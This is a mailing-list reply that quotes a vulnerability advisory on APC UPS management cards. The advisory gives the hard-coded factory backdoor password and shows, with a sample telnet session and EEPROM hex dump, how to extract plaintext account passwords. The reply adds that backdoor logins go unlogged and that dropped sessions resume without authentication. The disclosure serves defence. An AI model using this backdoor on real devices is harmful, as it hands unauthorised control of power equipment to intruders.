<<< Date Index >>>     <<< Thread Index >>>

Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"



In-Reply-To: <1076930672.19026.88.camel@xxxxxxxxxxxxxxxxxxxxx>

Just tested on a client's Symmetra RM 12000 and had some interesting results 
with the following setup:

Model Number:           AP9617
Manufacture Date:       12/20/2002
Hardware Revision:      A10

Symmetra APP Ver:       120
Symmetra APP Date:      12/09/2002

AOS Card Ver:   120
AOS Card Date:  12/10/2002

There are a few side notes that should be noted:

The backdoor login does NOT show up in the event log for the system.

If the telnet session using the backdoor login is terminated with ^] then the 
session can be resumed simply by using telnet to sign back in with NO 
authentication. This even works if attempting to resume the session from a 
different IP address.

>*** Background:
>APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
>supply) products have a Web and SNMP management card installed that permits
>local serial console, TELNET, web and SNMP management, monitoring and
>mains power control of attached devices.
>
>
>*** The Problem:
>APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
>be abused to extract plain text username/password details for all accounts
>and hence gain unauthorised full control of the device.
>
>Tested vulnerable:
>SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
>MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
>
>
>*** Description:
>The "backdoor" password is designed for use by the factory for initial
>configuration of the card, e.g. MAC Address, Serial Number etc. However, it
>is possible to dump the contents of EEPROM which amongst other things
>stores the account usernames and passwords.
>
>The "backdoor" password is accepted via either the local serial port or
>TELNET. Use of the password on the web interface does not appear to be
>possible.
>
>
>*** To recreate (typical example):
>Connect a console to the serial port or TELNET to the card. At the username
>prompt use any username. The password is all alphabetic characters and is
>case sensitive: TENmanUFactOryPOWER
>
>At the selection prompt, type 13 and press return. Type the byte address of
>the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
>the username and password pairs. Different firmware revisions may have the
>account details at different EEPROM locations. The accounts in the example
>below are the default accounts after their passwords have been changed.
>Username: apc          Password: BBCCDDEEF
>Username: device       Password: AAAABBBBB
>
>Press return to get back to the Factory Menu and press ctrl-A to logout.
>You can now TELNET to the card again and use the account details you've
>just recovered to log into and control the device.
>
>You should use the other selections with extreme care. You may cause
>irrepairable damage and will most certainly invalidate any warranty.
>The EEPROM also contains other user-configurable options in either plain
>text or binary encoded form. They are not detailed in this advisory.
>
>Example:
>
>[root@always root]# telnet 192.168.1.1
>Trying 192.168.1.1...
>Connected to 192.168.1.1.
>Escape character is '^]'.
>
>User Name : phade
>Password  : TENmanUFactOryPOWER
>
>Factory Menu
><CTRL-A> to exit
>
>1AP9606
>2WA0044004472
>3G9
>410/25/2000
>500 C0 B7 A2 C8 2D
>6v3.2.1
>7A
>8A
>9192.168.1.1
>A255.255.255.0
>B192.168.1.254
>C
>D
>E
>F
>G
>
>Selection> 13
>
>Enter byte address in Hex(XXXX): 1d0
>
>01D0   FF 50 46 61 70 63 00 FF  .PFapc..
>01D8   FF FF FF FF FF FF 42 42  ......BB
>01E0   43 43 44 44 45 45 46 00  CCDDEEF.
>01E8   FF 64 65 76 69 63 65 00  .device.
>01F0   FF FF FF FF 41 41 41 41  ....AAAA
>01F8   42 42 42 42 42 00 FF 61  BBBBB..a
>0200   64 6D 69 6E 20 75 73 65  dmin use
>0208   72 20 70 68 72 61 73 65  r phrase
>0210   00 FF FF FF FF FF FF FF  ........
>0218   FF FF FF FF FF FF FF FF  ........
>0220   64 65 76 69 63 65 20 75  device u
>0228   73 65 72 20 70 68 72 61  ser phra
>0230   73 65 00 FF FF FF FF FF  se......
>0238   FF FF FF FF FF FF FF FF  ........
>0240   FF 00 00 FF FF FF FF 21  .......!
>0248   56 00 00 00 00 00 00 55  V......U
>
><sp>nxt,b-bck,p-pch,other-exit
>
>
>*** Workaround/fix: 
>Ensure that access to the local serial port is physically restricted and
>disable the TELNET interface as described in the device documentation. A
>patched version of the firmware which requires the management password
>to be entered before accessing the factory settings may be available
>from APC.
>
>
>*** Vendor status:
>APC were first notified six months ago on 12th August 2003 and were
>initially helpful in patching the problem. However, after testing a couple
>of beta fixes I've heard nothing for over 3 months.
>
>Dave Tarbatt,
>http://null.sniffing.net/
>
>
>--=-KV1stT8YdRNcY3VGzrOj--
>
>